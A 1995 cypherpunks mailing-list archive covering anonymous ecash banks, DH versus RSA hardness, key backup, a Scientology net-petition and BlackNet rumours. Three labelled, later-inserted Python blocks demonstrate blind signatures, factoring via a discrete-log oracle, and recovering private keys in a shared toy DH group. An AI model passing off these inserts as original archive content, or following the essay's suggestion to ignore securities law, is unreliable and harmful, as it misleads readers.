on line (old buckets revoked, new buckets issued).

What gives the ecash value is the ebank's promise to turn each edollar into 
a real dollar (minus a fee?) when presented for payment. This promise is 
made credible by the ebank's credit rating -- either because it is a 
bank/financial institution itself, or because it invests the original 
payments in some very secure instrument (eg t-bills).

Ecash, in other words, is just an AA(A) rated no interest debt security 
issued at face value. [Of course corporations, anonymous and otherwise, 
could issue other types of edebt -- zero coupon, interest bearing, even 
convertible into eshares...]

This, unfortunately, raises expensive regulatory hurdles for ebanks. Offers 
of securities to the public of the US (whether by a domestic or foreign 
ebank) would seem to require compliance with the Securities Act 1933, the 
Securities Exchange Act 1934, the various requirements of the SEC, and 
probably state investment laws. As well as the costs of mandated ongoing 
disclosure, and the setup costs of such a scheme (accountants, investment 
banks, Wall St lawyers), there are the problems of having to appoint a US 
indenture trustee (yet another body to convince of the merits of the 
scheme...) and produce an SEC approved prospectus (anyone for wading through 
300 Web pages?).

But, of course, these hurdles must be overcome (or bypassed, or even, 
perhaps, simply ignored) for an anonymous e-economy that is fully integrated 
into the real economy to develop.

Quite apart from the regulations, ebanks structured in this way must face 
certain facts of economic life. A stand-alone ebank (ie one which is not 
already a bank or other financial institution) will face not only regulatory 
costs and technical costs (eg eregistries) but also the cost of dealing with 
the real financial system -- it will cost money to get money from investors 
(transfer from their account to yours), and to return money to investors 
(transfer from your account to theirs). To offset these costs, ebanks will 
receive interest income and fee income.

The interest income will be minimal. By definition the assets of the bank 
will be low risk, and therefore low return. It is also likely that the bulk 
of the ecash will be outstanding for a relatively short time (see the mpeg 
you want, buy the ecash, buy the mpeg; the seller receives the ecash and 
converts it, or invests it in an anonymous corporation who converts it), 
perhaps only overnight.

And fees will discourage the use of ecash. The higher the fees, the less the 
prospect of anonymity will appeal to the person on the street (or is that 
the person on the information superhighway?). A certain amount of legitimate 
use would do wonders to smooth the path of the crypteconomy. It is just too 
easy to ban (or anathematise) the whole system if *every* edollar comes from 
the four horsemen of the cryptocalypse.

2.3 Implications for the real economy

a) Response of regulatory authorities

The wholesale interpenetration of the real and digital economies that 
anonymous corporations (and similar structures) allow provides a mechanism 
whereby the ability of the state to control individuals is lessened. As 
edollars control real assets, edollars too become real, and the anonymous 
e-economy and the real economy merge. [Or, perhaps, since the real economy 
will be bigger than the e-economy, the former *absorbs* the latter.] And 
once this merger has taken place, it will be too late for the state to act.

The state then, will tend to fear loss of control, and, as a distinct subset 
of that, loss of revenue through wholesale tax avoidance.

The tax problem is probably the easiest to solve. Instead of taxing the 
recipients of income, the sources of that income can be taxed (eg 
withholding taxes on dividends and e-dividends), and the ultimate 
expenditure of that income can be taxed (consumption taxes). This may seem 
like a big change, but in the history of taxation (which is just the history 
of bullying) a universal income tax is very recent. And the change is, after 
all, just one of emphasis.

The general response of the state (egged on by the establishment) to the 
prospect of waning control has been discussed at length by this group, as 
has the difficulty of operating in the financial products marketplace. I 
merely mention the possibility that the SEC will refuse any scheme that 
seeks to issue readily convertible anonymous securities, on the grounds that 
it will make the detection of securities offences (such as insider trading 
and stock parking and a million other technical evils) too difficult.

3 Where to from here?

Cypherpunks write code. It would be nice to develop the bank-in-a-box that 
led to a thousand guerilla ebanks springing up around the world (like so 
many points of light in a presidential speech). It may not be that easy.

But the legal and financial systems are still systems, and they can be 
hacked (although they tend to fight back -- forensic black ice...). 
Demonstrate the structures that make ecash a useful tool for solving real 
world problems (like having to pay tax, or signalling one's moves to the 
market), and the crypto-meme could spread to the arch-hackers of Wall St.

And evolving a modest ebank/anon-corp structure ('International Postage, 
Inc'?) might be a way to sneak under the wire of the regulators: no need to 
look too hard at some hobby project of a bunch of propeller heads, after 
all. Some home cooked legal documents, a bit of form filling and Hey Presto 
-- real money to keep remailers and start data havens really going. And when 
we launch the first CyP anonMutual Fund...

<vbg>

Anyway, I'll wait for the feedback and see if it's worth (in the 
moral/political sense) looking at this stuff further. The box the bank comes 
in might be filled with forms.

[BTW -- TINLA] 
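
Added example, not part of the original post: one way the "Chaumian system ... on-line settlement of transfers" in 1.3(a) and the "old buckets revoked, new buckets issued" flow in 2.2(c) could work, using textbook RSA blind signatures. The EBank class, the account name and the toy key are assumptions made for illustration.

```python
import hashlib
import secrets
from math import gcd

# Toy RSA key for a hypothetical ebank. The primes are the Mersenne primes
# 2^31-1 and 2^61-1: constructed for the demo, far too small for real use.
P, Q = 2**31 - 1, 2**61 - 1
N, E = P * Q, 65537
D = pow(E, -1, (P - 1) * (Q - 1))  # bank's private exponent


def coin_digest(serial: bytes) -> int:
    """Map a coin's serial number to an integer modulo N."""
    return int.from_bytes(hashlib.sha256(serial).digest(), "big") % N


class EBank:
    def __init__(self):
        self.withdrawal_log = []  # (account, blinded value) pairs the bank saw
        self.spent = set()        # serials already exchanged (revoked buckets)

    def sign_blinded(self, account: str, blinded: int) -> int:
        """Withdrawal: debit a known account, sign a value the bank cannot read."""
        self.withdrawal_log.append((account, blinded))
        return pow(blinded, D, N)

    def valid(self, serial: bytes, sig: int) -> bool:
        return pow(sig, E, N) == coin_digest(serial)

    def exchange(self, serial: bytes, sig: int, new_blinded: int) -> int:
        """On-line transfer: revoke the old coin, blind-sign the payee's new one."""
        if not self.valid(serial, sig):
            raise ValueError("bad signature")
        if serial in self.spent:
            raise ValueError("double spend")
        self.spent.add(serial)
        return pow(new_blinded, D, N)


def new_coin_request():
    """Customer side: pick a secret serial and blind its digest with r^E."""
    serial = secrets.token_bytes(16)
    while True:
        r = secrets.randbelow(N - 2) + 2
        if gcd(r, N) == 1:
            break
    blinded = coin_digest(serial) * pow(r, E, N) % N
    return serial, r, blinded


def unblind(blind_sig: int, r: int) -> int:
    """(m * r^E)^D = m^D * r, so dividing by r leaves the bank's signature on m."""
    return blind_sig * pow(r, -1, N) % N


def demo() -> dict:
    bank = EBank()
    # Alice withdraws one coin under her (known) account.
    serial_a, r_a, blinded_a = new_coin_request()
    sig_a = unblind(bank.sign_blinded("alice-account", blinded_a), r_a)
    # Bob is paid with it and exchanges it on line for a fresh coin of his own.
    serial_b, r_b, blinded_b = new_coin_request()
    sig_b = unblind(bank.exchange(serial_a, sig_a, blinded_b), r_b)
    # Passing the same coin a second time is refused.
    try:
        bank.exchange(serial_a, sig_a, blinded_b)
        replay = "accepted"
    except ValueError as err:
        replay = str(err)
    seen_at_withdrawal = {value for _, value in bank.withdrawal_log}
    return {
        "alice_coin_valid": bank.valid(serial_a, sig_a),
        "bob_coin_valid": bank.valid(serial_b, sig_b),
        "replay": replay,
        # The bank only ever saw the blinded value, never the coin it redeems.
        "bank_saw_coin_at_withdrawal": coin_digest(serial_a) in seen_at_withdrawal,
    }


if __name__ == "__main__":
    print(demo())
```

The bank learns who withdrew and, separately, which serials were spent, but the random blinding factor leaves it nothing with which to join the two lists.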





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Wed, 18 Jan 95 19:01:47 PST
To: cypherpunks@toad.com
Subject: On DH public key crypto
Message-ID: <199501190301.TAA09049@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


Diffie and Hellman did have a public key cipher based on matrices in
their original paper; they knew at the time it didn't work.

This is not the same algorithm as the D-H key exchange protocol.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Wed, 18 Jan 95 19:39:11 PST
To: cypherpunks@toad.com
Subject: Re: Key backup (was: How do I know . ..)
In-Reply-To: <199501181754.MAA24686@bb.hks.net>
Message-ID: <199501190338.TAA09099@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: "Dr. D.C. Williams" <dcwill@ee.unr.edu>

   Safe deposit boxes, by virtue of their accessibility to law enforcement,
   are subject to search and seizure under court order and are sealed
   in certain cases (probate). This makes them likely to be the first place
   to look when the Feds decide that we can't have keys anymore. 

I am not designing systems for the paranoid fantasy of an inspection
of all safety deposit boxes by government agents in search of
contraband.

I am interested in designing systems which will fit into business as
usual, that are inconspicuous by their prevalence, and which will be a
part of ordinary and usual protection of data by cryptographic means.

Our goals appear to differ enough to preclude my continuing
involvement on this topic.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dwa@mirage.svl.trw.com (Dana Albrecht)
Date: Wed, 18 Jan 95 19:39:07 PST
To: cypherpunks@toad.com
Subject: Factorisation and Discrete Logs (was Re: EE Times on PRZ)
Message-ID: <9501190339.AA20854@mirage.svl.trw.com>
MIME-Version: 1.0
Content-Type: text/plain


strick wrote:
> 
> DH uses "discrete log" as the hard problem, and very straightforward
> mathematics.
> 
> RSA uses "factoring" as the hard problem, and a very clever back door.
> 
> How do you decide if one is based on the other?
> 
> # public-key technology with Diffie-Hellman public-key in particular, which
> # (as I understand it) is not particularly secure.
> 
> It's still up in the air, isn't it, whether the discrete log or 
> factoring is the harder to crack.   My intuition is they're the
> same hard.
> 
> I know of no problem with DH that RSA doesn't have similar problems.
> 
> 			strick

 
It seems to me that factoring a large number is no harder than finding
a discrete logarithm.

Assume, for the moment, that an efficient method of computing discrete
logs has been discovered, rendering systems like Diffie-Hellman key
exchange unusable.

I contend that RSA is now equally unusable.  The following variant of
the Pollard p-1 method should provide an efficient factorisation method
for an RSA modulus, say N.

Choose, at random, "a" such that gcd(a,N) = 1.

Compute x such that:

     a^x = 1 (mod N)          [ Discrete log time! ]

Partially factor x; say x = f_1 * f_2 * f_3 ...   where f_n is not necessarily
prime.

Note that it is usually easy to partially factor a "random" large integer.
Simply using trial division up to some limit; or, at worst, Pollard rho
or Pollard p-1 (on x) should suffice.  If you're truly unlucky, pick
another value for a.

Compute:

     M = a^(10000! * f) (mod N)

Where f is some partial factor of x.

gcd(M-1,N) should yield a non-trivial factor of N.  If it doesn't,
another choice of f and/or a should work.

I'm by no means a professional mathematician, but it seems that this
scheme should work.

Comments, anyone?


Dana W. Albrecht
dwa@mirage.svl.trw.com
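
Added example, not part of the original post: the reduction sketched above, run on toy moduli. The brute-force order_oracle stands in for the hypothetical efficient discrete-log solver and is assumed to return the multiplicative order of a; the 10000! multiplier is left out because on moduli this small it would make every exponent a multiple of the order, and f is taken as x divided by one partial factor. The moduli 3233 = 53 * 61 and 8051 = 83 * 97 are constructed sample inputs.

```python
from math import gcd


def order_oracle(a: int, n: int) -> int:
    """Stand-in for the hypothetical discrete-log solver: brute-force the
    smallest x > 0 with a^x = 1 (mod n). Only feasible for toy n."""
    x, acc = 1, a % n
    while acc != 1:
        acc = acc * a % n
        x += 1
    return x


def partial_factors(x: int, limit: int = 10_000) -> list:
    """Trial division up to `limit`. Any leftover cofactor is returned as-is,
    since the pieces do not have to be prime for the method to work."""
    pieces, p = [], 2
    while p <= limit and p * p <= x:
        if x % p == 0:
            pieces.append(p)
            while x % p == 0:
                x //= p
        p += 1
    if x > 1:
        pieces.append(x)
    return pieces


def factor_with_oracle(n: int, bases=range(2, 50)):
    """Try to split n using the order of a few bases.

    Returns (factor, a, x, f) on success, or None if every base failed.
    For n = p*q the order x is lcm(ord_p(a), ord_q(a)). Dividing x by one
    piece gives an exponent f with a^f != 1 (mod n); whenever ord_p(a)
    still divides f but ord_q(a) does not, gcd(a^f - 1, n) is exactly p.
    """
    for a in bases:
        if gcd(a, n) != 1:
            continue  # the post asks for gcd(a, N) = 1
        x = order_oracle(a, n)
        for piece in partial_factors(x):
            f = x // piece
            g = gcd(pow(a, f, n) - 1, n)
            if 1 < g < n:
                return g, a, x, f
        # Both orders lost the same piece every time: try another base.
    return None


if __name__ == "__main__":
    for modulus in (3233, 8051):
        print(modulus, factor_with_oracle(modulus))
```

For N = 3233 and a = 2 the order is 780; the exponent 390 yields only a trivial gcd, while 260 is a multiple of the order modulo 53 but not modulo 61, so the gcd is 53.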





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Wed, 18 Jan 95 19:52:16 PST
To: cypherpunks@toad.com
Subject: Re: (none)
In-Reply-To: <Pine.3.88.9501181026.A29048-0100000@CSOS.ORST.EDU>
Message-ID: <199501190351.TAA09133@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Brian Beattie <beattie@CSOS.ORST.EDU>

   I must assume that the actor who spams me or sends me unsolicited
   email or any email for that matter derives some benefit from this 
   activity or they would not do it.

Much tort involves perceived gain by the tortfeasor, but that doesn't
make it theft.

   If I make it clear that I do not wish to receive email from an individual
   or group and that individual or group continues to send email then I contend
   that they are using my resources in a way that I have not authorized.

So who are you making it clear to, if the parties sending the email
are anonymous?

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: skaplin@mirage.skypoint.com (Samuel Kaplin)
Date: Wed, 18 Jan 95 18:02:40 PST
To: cypherpunks@toad.com
Subject: --> A Net-Petition to the Church of Scientology, Please Read (fwd) (fwd)
Message-ID: <lOS7lKjqRKvE077yn@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----



I thought this was topical and VERY much of interest here.

Sam

- -------- Forwarded message --------

[Hurry!  Signature tallying for this petition EXPIRES February 6, 1995!
Be sure to send your signature to cos-petition@netcom.com -- see the
instructions after the petition statement.  The petition statement
begins 68 lines down from here.]


Following this short introductory section is the petition statement to
the Church of Scientology and affiliated organizations regarding their
recent legal actions which have very serious ramifications for freedom
of expression on Usenet and the Internet.  It is somewhat long, but the
length is necessary to give you sufficient information to make an
informed decision.

I want to stress that this petition is NOT focused on the beliefs or
practices of the Church of Scientology.  Rather, it is focused on their
recent legal action, and this petition demands that they reconsider
these actions for the good of everyone, including themselves.  It should
also be made *very clear* that none of us should ever condone or support
any action which would censor or inhibit Scientology supporters from
being able to express their views and opinions on Usenet, the Internet,
and all other electronic forums, provided they do so in accordance with
accepted netiquette, as all of us should.

I encourage you to read the petition statement carefully, and if you
agree with all three demands (given near the end of the statement), to
then "sign" it via Internet e-mail using the instructions which follow
the statement.  Do follow EXACTLY the directions on how to "sign";
they are not difficult.

Note that only those with valid Internet-accessible e-mail addresses can
sign this petition.  Fortunately, nearly all on-line services, such as
CompuServe, and many BBS, do offer Internet e-mail access, so just about
anybody who is electronically hooked up to some network in the world can
sign this petition.  If you are not sure what your Internet e-mail
address is, ask your site's sysadmin/sysop for assistance.

Please do upload this petition statement as soon as possible to any BBS
and on-line service in your area.  If you have access to one of the
major national on-line services such as CompuServe, Prodigy, AOL, etc.,
do try to upload it there.  We are trying to get at least 5000
signatures.  Even more signatures are entirely possible if we each put
in a little effort to inform others, such as friends and coworkers,
about the importance of this petition to electronic freedom of
expression.

I plan to make the signatures publicly available on or shortly after
February 7, 1995, and will also submit them to the Church of Scientology
as well as the newsmedia.

Important Note:  Because of the unusual sensitivity of this petition, I
will not submit nor reveal the e-mail signatures IF the total number of
validated signatures is less than 1000.  This offer is made for those
who would feel "exposed" if their name appears on a list with a small
number of signatures.  I fully expect to surpass 1000 signatures in one
or two days!  In addition, unlike past net-petitions, providing one's
full name in addition to one's e-mail address will be optional.
However, I highly encourage you to be brave and include your full name,
as all petitions are traditionally considered more "binding" if real
names are used.  I will tally the number of signatures with and without
full names when the petition drive ends February 6, 1995.

Thank you for your signature!  Let's all do our part to keep all
electronic networks free and open for everybody.

Jon Noring

(Disclaimer:  Nothing written in this petition transmittal should be
              construed as legal advice.  If you need legal assistance
              or advice concerning any of the issues brought up in this
              document, contact a qualified attorney.)


**************** Beginning of Petition Statement ********************

TO: The Church of Scientology, The Religious Technology Center, Bridge
    Publications, Inc., Office of Special Affairs, and all other
    affiliated organizations, divisions and corporations of the Church
    of Scientology

We, the undersigned, are disturbed by your recent legal attempts to
stifle the free flow of information on the Internet and Usenet.
Specifically, you have 1) threatened legal action against several
automated anonymous remailers unless they filter out *all* e-mail
targeted to the legitimate Usenet newsgroups alt.religion.scientology
(a.r.s.), and alt.clearing.technology (a.c.t.), open forums where all
points of view about Scientology, both pro and con, are welcome, and
2) demanded and actually attempted the removal of a.r.s. in gross
defiance of accepted Usenet practice and netiquette.

Concerning 1), since nearly all (if not all) of the e-mail sent to
a.r.s. and a.c.t. via the remailers is legitimate and originates from
individuals who sincerely believe they need to post anonymously because
of the nature of discussion, your demand, if implemented, would prevent
these individuals from freely expressing their views in the proper
forum.  Freedom of expression is internationally recognized as one of
the most important and sacred of basic human rights, and your demands
fly in the face of this recognition.  Your second demand, removing
a.r.s., would go even further in inhibiting freedom of expression on
all electronic networks.  It is a *very* serious matter to attempt to
remove forums of free expression.

Your primary argument for issuing these legal threats, according to
your statements, is that some people (the "perpetrators") have
knowingly posted *alleged* (meaning not yet demonstrated in a court of
law) Church of Scientology copyrighted and trade secret material to
a.r.s. and a.c.t., sometimes using the anonymous remailers as the
carrier (because of the common carrier-like nature of anonymous
remailers, the administrators of the remailers have no knowledge of such
activity taking place).  Though we do not condone making copyrighted
material available on any electronic network without the permission of
the copyright holder, your specific legal threats are short-sighted,
perceived to be mean-spirited, ineffective, and are on tenuous legal
grounds because

1) It won't stop those who are determined to make available alleged
   copyrighted materials on electronic networks.  They will find other
   avenues on the electronic networks to do so.  Only prosecuting the
   actual perpetrators will deter this alleged illegal activity.
2) Your demands, if met, will have the effect of leading to significant
   stifling of free speech and the exchange of information on all
   electronic networks which, if not illegal in some jurisdictions, goes
   against all accepted conventions of a free and open society,
3) You have not stated, nor is there any indication, that you intend to
   work in a cooperative manner with legitimate law-enforcement
   agencies, the courts, and/or the Internet to locate and prosecute
   the perpetrators of the *alleged* copyright violations in the
   countries they originated.

Thus, your threats are being construed, rightly or wrongly, by most on
the electronic networks as an attempt to stifle free discussion on
Scientology rather than trying to locate and prosecute the perpetrators
of the *alleged* copyright and trade secret violations.

With respect to the attempted removal of the newsgroup a.r.s., you also
stated that the word 'scientology' is trademarked and thus the name
a.r.s. infringes on such trademark.  This is appallingly ludicrous based
on past case law of similar situations, as well as your implicit
acknowledgement of the legitimacy of a.r.s. by allowing Church of
Scientology approved information to be posted to it by your supporters,
and possibly with your knowledge and/or approval, ever since it was
created July 1991, almost 3.5 years ago.

Therefore, we, the undersigned, make the following demands.

1) Regarding your charges of copyright violation over electronic
   networks:  You will cease all legal action, now and in the future,
   against any person, company, organization, etc., associated or
   affiliated in any way with all electronic networks, including the
   Internet, except that action which is necessary to locate and
   prosecute the perpetrators (as previously defined) of alleged
   copyright and trade secret violations, and other activity in
   violation of law, and *only* in full cooperation with legitimate
   law-enforcement agencies and/or the courts.

2) Regarding your trademark challenge of the Usenet newsgroup
   alt.religion.scientology:  You will cease all legal action, now and
   in the future, to remove any Usenet newsgroup, BBS forum, mailing
   list or other similar forum of public exchange of information over
   any electronic network, or to inhibit in any way the flow of
   information to and from these forums.  This includes, for example,
   ceasing all legal action demanding a) the removal of the Usenet
   newsgroup alt.religion.scientology and b) that anonymous remailers
   add filters as previously described.

3) You will publicly and officially state

   a) That you support the existence of free and open forums on all
      electronic networks to discuss Scientology from all perspectives
      and points of view (which includes yours), and

   b) That you do not support nor condone attempts by any entity to
      electronically censor, remove, obstruct, or tamper with any
      electronic communication except when allowed by a valid court
      order.

If you outright reject or refuse to even discuss these demands in a good
faith manner on Usenet, we have no other option but to consider such
rejection or refusal to even discuss to be an act of hostility by the
Church of Scientology towards the users of all electronic networks and
forums, including the Internet.  We are certain you do not want this,
and we do not want it either, so we offer to work with you any way we
can with regard to any legitimate demands you may have concerning
alleged copyright violation(s) and other illegal activity.

However, any attempts by you of any kind to tamper or in any manner
restrict the free flow of information (other than that *specifically*
restricted by law -- and *only* that) on any electronic network is
totally unacceptable and will not be tolerated for the reasons stated
above.

Signed,




******************* End of Petition Statement ***********************

======================================
Instructions for Signing This Petition
======================================

It must first be noted that this is a petition, not a vote.  By
"signing" it you agree with *all* the demands of the petition
statement.  If you do not agree with all the demands, then your only
recourse is to not sign it.

In addition, all e-mail signatures will be submitted to the Church of
Scientology as well as the newsmedia provided more than 1000 validated
signatures are obtained.  Including your full name is optional, but
very highly encouraged as that would add to the effectiveness of the
petition.  Signing via an anonymous remailer is discouraged, but not
forbidden, as an attempt will be made to separately tally signatures
from anonymous remailers.

Signing this petition is not hard, but to make sure your signature is
not lost or miscounted, please follow these directions exactly:

1) Prepare an e-mail message.  In the main body (NOT the Subject line)
   of your e-mail include the ONE-LINE statement:

SIGNED <Internet e-mail address> <Your full name (optional)>

   You need not include the "<" and ">" characters.  'SIGNED' should
   be capitalized.  As stated above, your full name is optional, but
   highly recommended.  If you do supply your name, please don't use
   a pseudonym or nickname, or your first name -- it's better to just
   leave it blank if it's not your full and real name.

              ***************************************
              Example:  My e-mail signature would be:

              SIGNED noring@netcom.com Jon E. Noring
              ***************************************

2) Please DON'T include a copy of this petition, nor any other text,
   in your e-mail message.  If you have comments to make, send e-mail
   to me personally, and NOT to the special petition e-mail signature
   address.

3) Send your e-mail message containing your signature to the following
   Internet e-mail address and NOT to me:

                     ===========================
                       cos-petition@netcom.com
                     ===========================

4) Within a few days of receipt of your signature, an automated
   acknowledgment will be e-mailed to you for e-mail address
   verification purposes.  You do not need to respond or reply to
   this acknowledgement when you receive it.


Thank you for signing this petition!

Jon Noring

(p.s., send your signature to cos-petition@netcom.com)


- --
OmniMedia           | The Electronic Bookstore.  Come in and browse!  Two
1312 Carlton Place  | locations:  ftp.netcom.com  /pub/Om/OmniMedia/books
Livermore, CA 94550 | and  ftp.awa.com  /pub/softlock/pc/products/OmniMedia
510-294-8153        | E-book publishing service follows NWU recommendations.


- --
==============================================================================
skaplin@skypoint.com                   | Finger skaplin@infinity.c2.org for
                                       | a listing of crypto related files
PGP encrypted mail is accepted and     | available on my auto-responder.
preferred.                             | (Yes...the faqs are there!)
                                       |
E-mail key@four11.com for PGP Key or   | "...vidi vici veni" - Overheard
Finger skaplin@mirage.skypoint.com     | outside a Roman brothel.
==============================================================================
     A skydiving school is one in which you MUST be a dropout to graduate

- --
==============================================================================
skaplin@skypoint.com                   | Finger skaplin@infinity.c2.org for
                                       | a listing of crypto related files
PGP encrypted mail is accepted and     | available on my auto-responder.
preferred.                             | (Yes...the faqs are there!)
                                       |
E-mail key@four11.com for PGP Key or   | "...vidi vici veni" - Overheard
Finger skaplin@mirage.skypoint.com     | outside a Roman brothel.
==============================================================================
    All things being equal, a fat person uses more soap than a thin person.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Syed Yusuf <yusuf921@uidaho.edu>
Date: Wed, 18 Jan 95 20:00:55 PST
To: Craig Hubley <craig@passport.ca>
Subject: Re: FBI and BLACKNET
In-Reply-To: <m0rU8z7-0002GdC@forged.passport.ca>
Message-ID: <Pine.HPP.3.91.950118195153.6655E-100000@goshawk.csrv.uidaho.edu>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 17 Jan 1995, Craig Hubley wrote:

> Regarding BlackNet, I am not sure that they are not *run* by the FBI,
> or NSA, or CIA, MI6, Interpol, or some more mysterious quasi-governmental 
> entity. 

The more I think about it the more this theory makes sense. I know 
how they _could_ have traced me but this doesn't explain all their other
"leads" they are following up on and he seemed to imply there were many.

>>> Not to mention entrapment is their MO. <<<

What do you say we put the word out?


> Craig Hubley                Business that runs on knowledge
> Craig Hubley & Associates   needs software that runs on the Web
> craig@passport.ca   416-778-6136  416-778-1965 FAX

--Syed





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Wed, 18 Jan 95 20:05:41 PST
To: rishab@dxm.ernet.in
Subject: Re: Lance Rose writes anti-cryptoanarchy in WIRED
In-Reply-To: <gate.i724yc1w165w@dxm.ernet.in>
Message-ID: <199501190404.UAA24779@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


rishab@dxm.ernet.in wrote:

> Sheesh. And here we are, post-BlackNet, discussing untraceable paid-for
> anon-remailers (which exist today on Sameer's c2.org blind server) and
> data havens. I haven't bothered to hunt for Lance's address, which is not
> given, but really I thought someone as prominent a SysLawyer as him would
> be clued in. Nor have I found the time to send WIRED a letter. 

First, I want to know how Rishab, in India, gets "Wired" so early (or
why I, right next to Silicon Valley, get it so late). He's mentioned
the February issue twice now, and all I have is the January "White
Album."

Second, I didn't know Lance Rose was a lawyer, or even a "SysLawyer"
(?). When I met him a couple of years ago, he'd just gotten out of
jail and was working for the satellite Usenet distribution company
(whose name I don't recall, and who I've heard less of than I might've
expected to, subjunctively speaking).

In any case, there are a zillion odd opinions on the Net of a Million
Lies. Most of them will vanish without a trace. That's comforting.

--Tim May

-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 18 Jan 95 17:22:42 PST
To: "Timothy C. May" <tcmay@netcom.com>
Subject: Re: Good "Economist" article on Cyberspace
In-Reply-To: <199501190038.QAA23631@netcom4.netcom.com>
Message-ID: <Pine.SUN.3.91.950118201336.15785A-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


Right Tim it was a great article in the Economist Tradition.  I'll post 
it as soon as it makes it into the databases.

Unbelievable Barlow Quote:

On-line purists might want nothing to do with government, but government 
was likely to intrude anyway.  So the EFF sought to minimise the 
intrusion; "to keep Pharaoh from following us into the Red Sea," as Mr. 
Barlow puts it.


I *want* Pharaoh to follow us into the Red Sea, myself.

DCF

--
You don't have to be nice to nation states you meet on the way up if 
you're not coming back down.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Wed, 18 Jan 95 20:50:57 PST
To: cypherpunks@toad.com
Subject: Re: Factorisation and Discrete Logs
In-Reply-To: <9501190357.AA12988@toxicwaste.media.mit.edu>
Message-ID: <199501190440.UAA28769@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Derek Atkins <warlord@MIT.EDU> writes:

 > You are right...  Given talks I've had with Brian LaMacchia,
 > who broke a version of "Secure SunRPC" (a 192-bit prime), he
 > claims that the difficulty in reducing a D-L problem is
 > about the same amount of computation to factorize an RSA
 > modulus of approximately the same size..

Although DH and RSA are believed to be of approximately equal
difficulty given the same number of bits, DH is additionally
vulnerable because system designers usually publish an "official"
modulus and primitive root for everyone to use, whereas in RSA,
everyone has their own key.

To mount an attack on PGP, for instance, you must factor a key
for each person whose privacy you wish to compromise.  Breaking
Sun's published 192 bit DH modulus instantly broke SunRPC on all
machines using the protocol.  The latter was a lot less work than 
the former.

-- 
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $
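
The amortization Mike Duvos describes, as an added example that is not part of the original message: when every user shares one published (modulus, generator) pair, the expensive table is computed once and then reused against each public key. The prime 2^31 - 1, generator 7, the table size and the three private exponents are toy values constructed for this sketch; the baby-step/giant-step method stands in for the far heavier computation a real 192-bit modulus needs.

```python
# Toy shared Diffie-Hellman group (constructed for this example).
P = 2**31 - 1          # Mersenne prime
G = 7                  # primitive root modulo P
TABLE_SIZE = 1 << 17   # one-time precomputation budget


class SharedGroupTable:
    """Baby-step table for one (p, g): built once, reused for every key."""

    def __init__(self, p, g, size):
        self.p, self.g, self.size = p, g, size
        self.baby = {}
        value = 1
        for j in range(size):                 # one-time cost: `size` multiplications
            self.baby.setdefault(value, j)    # g^j -> j
            value = value * g % p
        # value is now g^size; its inverse (Fermat) is the giant-step factor.
        self.giant = pow(value, p - 2, p)
        self.max_steps = -(-(p - 1) // size)  # ceil((p - 1) / size)

    def discrete_log(self, h):
        """Return (x, steps) with g^x == h (mod p), or (None, steps)."""
        gamma = h % self.p
        for i in range(self.max_steps):
            j = self.baby.get(gamma)
            if j is not None:
                return i * self.size + j, i + 1
            gamma = gamma * self.giant % self.p   # h * g^(-size * (i + 1))
        return None, self.max_steps


def recover_all(private_exponents):
    """Build the table once, then solve every user's public key with it."""
    table = SharedGroupTable(P, G, TABLE_SIZE)
    results = []
    for secret in private_exponents:
        public = pow(G, secret, P)            # what the user publishes
        x, steps = table.discrete_log(public)
        results.append((public, x, steps))
    return table, results


# Constructed sample secrets for three users of the same group.
SAMPLE_SECRETS = [123456789, 2000000011, 987654321]

if __name__ == "__main__":
    table, results = recover_all(SAMPLE_SECRETS)
    print("one-time table entries:", table.size)
    for public, x, steps in results:
        print("public", public, "-> exponent", x, "in", steps, "steps")
```

Per-key cost is bounded by max_steps lookups after the single table build, which is why a group shared by all installations should be sized for the value of every session it protects, not one.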



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Wed, 18 Jan 95 21:43:25 PST
To: tcmay@netcom.com (Timothy C. May)
Subject: Re: Lance Rose writes anti-cryptoanarchy in WIRED
In-Reply-To: <199501190404.UAA24779@netcom6.netcom.com>
Message-ID: <199501190459.UAA26969@netcom12.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:

> Second, I didn't know Lance Rose was a lawyer, or even a "SysLawyer"
> (?). When I met him a couple of years ago, he'd just gotten out of
> jail and was working for the satellite Usenet distribution company
> (whose name I don't recall, and who I've heard less of than I might've
> expected to, subjunctively speaking).

Josh Geller reminded me that it may've been Len Rose I was thinking
of. Len, Lance, I don't know.

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
